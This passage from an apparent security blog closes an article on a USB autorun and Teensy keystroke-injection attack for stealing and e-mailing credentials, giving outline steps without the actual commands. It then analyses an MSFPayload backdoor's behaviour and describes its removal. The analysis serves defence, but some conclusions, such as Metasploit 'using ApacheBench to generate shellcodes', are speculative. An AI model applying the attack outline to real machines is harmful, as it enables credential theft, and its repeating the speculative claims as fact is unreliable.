Step 1:  Copy the .Bat file that issues the command described above.

Step 2: Make sure USB Autorun is enabled in the target machine.

Step 3: Copy the Autorun.inf file with the configuration described above.

Further Attack improvements

The attack described in this article can be optimized to be more resilient to antivirus software, but bypassing antivirus software is out of the scope of this article due to its added complexity.

Bypassing the auto-run limitation

The Teensy USB HID Attack Vector is a remarkable combination of customized hardware and bypassing restrictions by keyboard emulation. Traditionally, when you insert a DVD/CD or USB if autorun is disabled (after Windows XP service pack 2 autorun is disabled, I think it is SP2!), your autorun.inf isn’t called and you can’t execute your code automatically. With the Teensy HID based device you can emulate a keyboard and mouse. When you insert the device it will be detected as a keyboard, and with the microprocessor and onboard flash memory storage you can send a very fast set of keystrokes to the machine and completely compromise it. You can order a Teensy device for around 17 dollars at http://www.prjc.com.

The following extract was taken from the blog of werew01f which he/she was kind enough to commend on the inaccuracy of this blog post:

Teensy, USB-based micro-controller development board, which can be programmed to emulate as any device and store programming code. I have wrote an article that describes how you can emulate the device as a HID (Human Interface Device) and inject attack codes and execute commands in the system.
    

Epilogue

I sure I proved how easy is to steal and e-mail user credentials within a few seconds even you have little to no experience at all. Again nowadays it is very critical to protect your assets from all dangers. The best think someone could do to protect his/her information is to disable autorun and apply proper Endpoint Protection Software.

References:

1. http://caspian.dotconf.net/menu/Software/SendEmail/
2. http://upx.sourceforge.net/
3. http://technet.microsoft.com/en-us/library/dd346760.aspx
4. http://www.nirsoft.net/utils/passwordfox.html
5. http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
6. http://en.wikipedia.org/wiki/Open_mail_relay
7. http://www.samlogic.net/articles/autorun-usb-flash-drive.htm
8. http://www.samlogic.net/articles/autorun-usb-flash-drive-windows-7.htm
9. http://en.wikipedia.org/wiki/Conficker
10. http://lazybit.com/index.php/2007/03/01/usb_flash_drive_autorun
11. http://www.offensive-security.com/metasploit-unleashed/Teensy_USB_HID_Attack 

Malware Analysis of MSFPayload

Intro

Nowadays the only people that can actually do a decent Mal-ware analysis are ONLY antivirus research vendors such as Symantec and McAfee. The only thing a Security administrator or an Information Security Consultant can do is Mal-ware behavior analysis. That it is the initial stage of lets say a high profile Mal-ware analysis, but that might not be enough. There are no more than 1000 human beings in this planet that can properly reverse engineer a worm such as Confliker and start writing disinfection tools from scratch (or maybe there are, who knows) or they cannot do it in a reasonable amount if time.

So the next best think from fully reverse engineering a Trojan horse is to do a behavioral analysis and try to confine or mitigate the malicious software. But to me it seems that it is not clear to many people on how to do that or what disinfection really means. For me disinfection means to completely identify how a virus behaves and use proprietary tools to restrain it in such a manner that is going to be no risk.

Lately I was doing some Mal-ware analysis on behalf of a client and  I decided to write a mini guide on how to perform a disinfection strartegy. So for the purposes of this article I am going to do a Mal-ware analysis of  an MSFPayload executable, why? Because is free, open source point and "single point and click" hacking tool. As already demonstrated in a previous article found here someone can embed a MSFPayload in practically any executable by using free Windows tools that come with default windows installations. So what are the techniques of Mal-ware is using?

Occupy Memory Residency

Memory-resident programs are those that can be placed in, and remain in, an affected system's main memory space after execution. Memory residency enables a piece of malware to be readily available whenever needed, ensuring that the malware is easily accessible or can monitor every event on an affected system. This is a malware's way of controlling every activity on an affected system when a condition is satisfied. To find out if a malware is resident in the memory, you may need to invoke system tools like the Task Manager in Windows NT-based systems. On Windows 95- or 98-based systems, you can press CTRL-ALT-DEL, which displays a window containing all the running processes in memory. Once you have full view of the things that are currently in memory, check if a malware is there or not. This is tricky and at the same time risky. Terminating a memory-resident program that is critical to a system may cause some undesirable results, such as displaying the Blue Screen of Death or even triggering the system to restart. It is advisable to check if a specific memory-resident program is indeed alien to the system, which is not an easy task.

Spoof Process Names

Contemporary malware tends to use process names that look strikingly similar to common process names. For example, WSOCK32.DLL, a common process in memory handling the library of socket functions, can be spoofed as WSOCK33.DLL. Another is KERNE132.dll (notice that the L in KERNEL is actually the number 1) can be mistaken for the real KERNEL32.DLL. Sometimes the names are actually valid but the path is different. The KERNEL32.DLL is always found in the \Windows\System32 directory but some malware puts it in \Windows\System (in the example displayed below you can see how MSFPayload is using mswinsoc.dll). 

Alter Start Up locations

Other areas where AutoStart entries can be found are in the files, System.ini and Win.ini. A malware often modifies these with links to itself added to the "run=" or "load=" sections of the files. These files are located at the Windows Directory (typically C:\Windows). Following the same approach that you followed with the registry entries, you can remove them from the AutoStart entries after you have verified that they are malicious. Again, back up these files before making any modification just in case the entries are not malicious and you have to restore the files to their original form. All the necessary system configuration files can be accessed, viewed and edited with the Sysedit program. To invoke the program, click "Start", and then "Run", and then type "Sysedit" in the "Open:" box. Another place where you can find autostart entries are in the Start > (All) Programs > Startup folder. The entries here are also referenced and are executed immediately after system startup. Similarly, you may need to back up these files before tinkering with them. You can also have a look at msconfig wizard to see all services and programs executed from OS.

Malicious Macros

Applications like word processing, spreadsheets or PowerPoint presentations are often vulnerable to macro viruses. You can check for malicious activities by checking for macros within these files. To do this, access the macros organizer (you may refer to your applications help file) and check if there are any unknown macros inside, press the ALT-F11 keys in the more recent offerings of Microsoft Office Family (beginning in Office 97 and up). However, some macro viruses tend to hide themselves from users by changing the foreground/background of the macro font display or by adding multiple tabs to make the text invisible to the default view pane. The following is an explanation of procedures readers can use for two different applications that use macros: MS Word and Excel. 

Infected MS Excel Documents

Search your hard drive for any folder name XLStart. For Excel, this folder contains all the things necessary for customization and this includes macros as well. You can transfer the contents of this folder to a temporary directory. Open Excel and turn on the Macro Virus Protection. After doing so, you can now open the Excel file that may be infected and then the Macro Virus Protection should be able to figure that out for you. 

What Mal-ware is and how?

Once executed, Mal-ware can perform its intended malicious function on a system. Unfortunately, it may not always be apparent to users that their system is indeed infected. Mal-ware is an ordinary program doing things that should not be doing, nothing more nothing less. I am going to use the same payload I used to do the demo on a previous articles, yep the one called ClickMe.exe. So what happens if we generate an MSFPayload that spawns a Shell and then listens for a connection, what tools should someone use? Well I am using the following tools:

1. Process Monitor v3.01 (from SysInternals)
2. Fport v2.0 (from McAfee)
3. Wireshark v1.6.7 (former Ethereal)
4. OllyDbg v 2.0

So what I am going to do next is to double click ClickOnMe.exe and start analyzing how it behaves, using the tools reported above and looks for thinks such as what is it's memory space, what dll file does it use, what connections does it open. 

Using Process Monitor for recording MSFPayload

So lets start with process monitor and try to record the behavior of the malicious file. What I am going to do is first launch the tool, double click on ClickOnMe.exe and then see what can we see from there. When you launch process monitor you can see that there is a filter button, so what I would do is to filter the process image name (we know it is ClickOneMe.exe)

Note: From the drop down list I checked Process Name and by inserting the process image name I filtered the desired executable. Something else someone cold do is to export the results into a CSV file, imported to an excel and do further analysis on how everything happened (time is also included).

Note: Se the XML format you can use, including all this valuable information such as stack trace and stack symbol resolution, and all that with a free tool, amazing ee?

The most interesting feature of this tool is the process activity tool that records all behavior of the process and timeline, just see below the features:

Note: Have a look at the registry activity, the tool is actually parting with the PC. It has totally 257 registry activities, amazing again. It also does some strange file I/O, later on we are going to have some further analysis on how to take advantage of this feature.

 

Note: This is one of the most interesting feature a process monitoring tool should have because if you click in the button save you can export all registry keys accessed from the process and then write a quick disinfection batch file e.g. deleting all created registry keys from the malicious process by using the command REG DELETE KeyName [/v ValueName | /ve | /va] [/f] from command prompt or what ever tool you use. You can also filter the registry keys associated with the Trojan based on access rights the Mal-ware has (e.g. read, write e.t.c) usually a Mal-ware is running on users permissions.

Another very cool feature of the tool is the file monitoring capability it has. Process Monitor can actually record all file accessed, modified and used by the Mal-ware while running, filtered per path, extension, and folder name:

Note: See the tool differentiating, how the Mal-ware treats WINDOWS, Prefetch and System32 system files. Metasploit has done a good job optimizing the behavior of MSFPayload utility. ClickOnMe.exe generates even a prefetch to optimize it behavior.  

Prefetcher as MSFPayload Mal-ware accelerator

The Prefetcher is a component of versions of Microsoft Windows starting with Windows XP. It is a component of the Memory Manager that speeds up the Windows boot process, and shortens the amount of time it takes to start up programs. In Windows Vista, SuperFetch and ReadyBoost extend upon the prefetcher and attempt to accelerate application and boot launch times respectively by monitoring and adapting to usage patterns over periods of time and loading the majority of the files and data needed by them into memory so that they can be accessed very quickly when needed. When Mal-ware is using prefetch then it can optimize it's performance.

Suspicious dll files loaded by MSFPayload        

One of the not so few dll files that our MSFPayload loads implies that network activity is happening from the Mal-ware. If you click to expand the plus sign in system32 you will see that mswsock.dll is used by the Mal-ware which means that an outbound connection was attempted. Winsock dll is a windows socket library. One of the many interesting function implemented in Winsock.dll is the gethostbyname which by the way is deprecated. The function mentioned tells us that our Trojan can do a DNS address resolution and sent probably personal data (of course we would have to be sure what function is used).   

Suspicious files loaded by MSFPayload
  
Now if you check the AppPatch windows file system you will see that SysMain.sdb was used, which contains both matching information and compatibility fixes per application. It can be found in the %Windir%\AppPatch directory.

Using FPort for recording MSFPayload

Fport is used to identify unknown open ports and their associated applications. FPort supports Windows NT4, Windows 2000 and Windows XP, it reports all open TCP/IP and UDP ports and maps them to the owning application. This is the same information you would see using the 'netstat -an' command, but it also maps those ports to running processes with the PID, process name and path. Fport can be used to quickly identify unknown open ports and their associated applications. Someone could use FPort to take periodically snapshots from the system your are trying to disinfect and that way record all connections from a possibly malicious software (you can add a task scheduler). The output of FPort concerning the ClickOnMe.exe is:

FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.

Pid   Process                Port  Proto   Path                         
3268  ClickOnMe ->  2565  TCP   C:\Documents and Settings\jerry\trojan\ClickOnMe.exe
3268  ClickOnMe ->  9000  UDP   C:\Documents and Settings\jerry\trojan\ClickOnMe.exe

Note: See that the MSFPayload uses both TCP and UDP.
  
Using Wireshark for recording MSFPayload

Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.   

We canuse Wireshark to record the MSFPayload and see how the payload looks like in the wire. When the ClickOnMe.exe tries to spawn a reverse shell to the attacker and then start listening for a connection (meaning it binds a shell to the desired port). So lets see what it does it. This is how start listening for all packets by selecting my network card (click to enlarge):

Note: This is how you start listening the net-card. Because tons of tutorials exist out there about Wireshark I am not going to waste more time on Wiresharking the MSFPayload.

Using OllyDebug for recording MSFPayload

OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg is a shareware, but you can download and use it for free.With OllyDbg you can analyze all sorts of Mal-ware and verify information that you collected from other software.

So what I would do is to launch MSFPayload and the attack the process and this is what you get:

 

  
Note: The process terminates immediately after it launches, but that is the stack footprint we get from OllyDebugger. 

Further investigation with Olly Debugger will reveal all engaged dll used from the MSFPayload (click to enlarge):

Note: You can see that the screen shot from above verifies the result from process monitor, again it reveals that mswsock.dll is used so a data confidentiality issue is what you should be looking for.

Using Olly Debugger can help you extract valuable hidden text about what the executable might be doing. In this occasion we could actually see from some ASCII dumps that the Mal-ware is connecting to something:

Address   ASCII dump
0040D230  C:H:P:A:g:X:de:Sq   bgcolor=whit
0040D250  e   Total of %d requests complet
0040D270  ed
 %s
 ..done
 Finished %d requ
0040D290  ests
   apr_socket_connect()
0040D2B0 
Test aborted after 10 failures

0040D2D0 
  
Server timed out

 apr_poll
0040D2F0      apr_sockaddr_info_get() for
0040D310  %s  error creating request buffe
0040D330  r: out of memory
   INFO: %s hea
0040D350  der ==
---
%s
---
 Request too
0040D370  long
   %s %s HTTP/1.0
%s%s%sCo
0040D390  ntent-length: %u
Content-type:
0040D3B0  %s
%s
    PUT POST    text/pla

Note: From the HTTP/1.0, PUT and POST keywords we can understand that the Mal-Ware is using Http to communicate with the attacker. We also know that Meterpreter payload is using http to communicate with the attacking machine. Show by going through these type of details we can find a lot of hidden information and make almost certain the connect back IP. We can even identify how many failed connection it will do until it stops trying to connect back to some IP.

The text shown below shows how it might be constructed our executable:

http://www.zeustech.net
0040E9C0  /<br>
   This is ApacheBench, Ve

Note: If we Google zeustech.net we will find that is a company with traffic manager appliances. Now if we Google ApacheBench (ab) we will find out that is a single-threaded command line computer program for measuring the performance of HTTP web servers. Originally designed to test the Apache HTTP Server, it is actually generic enough to test any web server.The ab tool comes bundled with the standard Apache source distribution, and like the Apache web server itself, is free, open source software and distributed under the terms of the Apache License.

Detecting Mal-ware through ApacheBench signature

Using the above information we can use industry antivirus software to build costume IPS and AV signatures:

Example Usage (taken from Wiki):

    ab -n 100 -c 10 http://www.something.com/

This will execute 100 HTTP GET requests, using 10 threads (10 requests per thread) to the specified URL, in this example, "http://www.yahoo.com". If someone goes to the relevant web page can actually find out about a the little details. So my assumption is that Metasploit is using Apache Bench some how to generate the shellcodes.There is a very interesting google-code project about Apache Bench you can find here.

Finally Removing The Mal-ware

OK we identified the Mal-ware, we found all the changes the Mal-ware did to our system now what? Well the question is relatively easy, you remove the virus. The process of doing that is pretty much easy. First you record all changes through the tools we described then you export the results in CVS format and import them into the excel you process the data e.g. identify new malicious registry keys, maliciously generated files e.t.c. After we do that we generate a Vb-script or a batch file performing the necessary actions to remove the virus. You can actually automate this process by writing an excel file that spits the desired Vb-script or use batch files using macros or you can simple use a bash script to do that by using various delicious tools. The Vb-script or a batch skeleton should consist of 4 sections:

[Section 1]

The Registry Key section (we do removing or deleting keys):

1. Registry keys to delete.
2. Registry keys to write.

[Section 2]
 
The File/Folder Section (we do removing or restoring files/folders):

1. Malicious files/folders to delete.
2. Malicious files/folders to restore.

[Section 3]
 
The Process Section (we do process killing):

1. Malicious process to kill (kill process with the desired process image name).
2. Malicious service to kill (kill service and make sure it does not restart).

[Section 4]

The Network Section (we do network activity killing):

1. Malicious Network activity to block ( e.g. Write costume signatures for host based IPS)
2. Malicious Network activity to record (e.g. Write costume signatures for host based IDS)

Further disinfection actions can be taken using other antivirus tools such as host integrity and software blocking tools. We can then distribute the appropriate Vb-script or batch file using Active Directory log-in scripts or other appropriate solutions such as software delivery tools.   


Epilogue

I proved once more that with freeware tools you can do lots of interesting stuff and one of them is Mal-ware analysis.

References:

1. http://www.wireshark.org/
2. http://www.mcafee.com/us/downloads/free-tools/fport.aspx
3. http://technet.microsoft.com/en-us/sysinternals/bb896645
4. http://www.computing.net/answers/programming/delete-a-registry-key-with-batch/8218.html 
5. http://en.wikipedia.org/wiki/Prefetcher 
6. http://msdn.microsoft.com/en-us/library/windows/desktop/ms738524%28v=vs.85%29.aspx
7. http://en.wikipedia.org/wiki/ApacheBench 
8. http://www.symantec.com/connect/articles/are-you-infected-detecting-malware-infection
9. http://code.google.com/p/apachebench-standalone/wiki/HowToBuild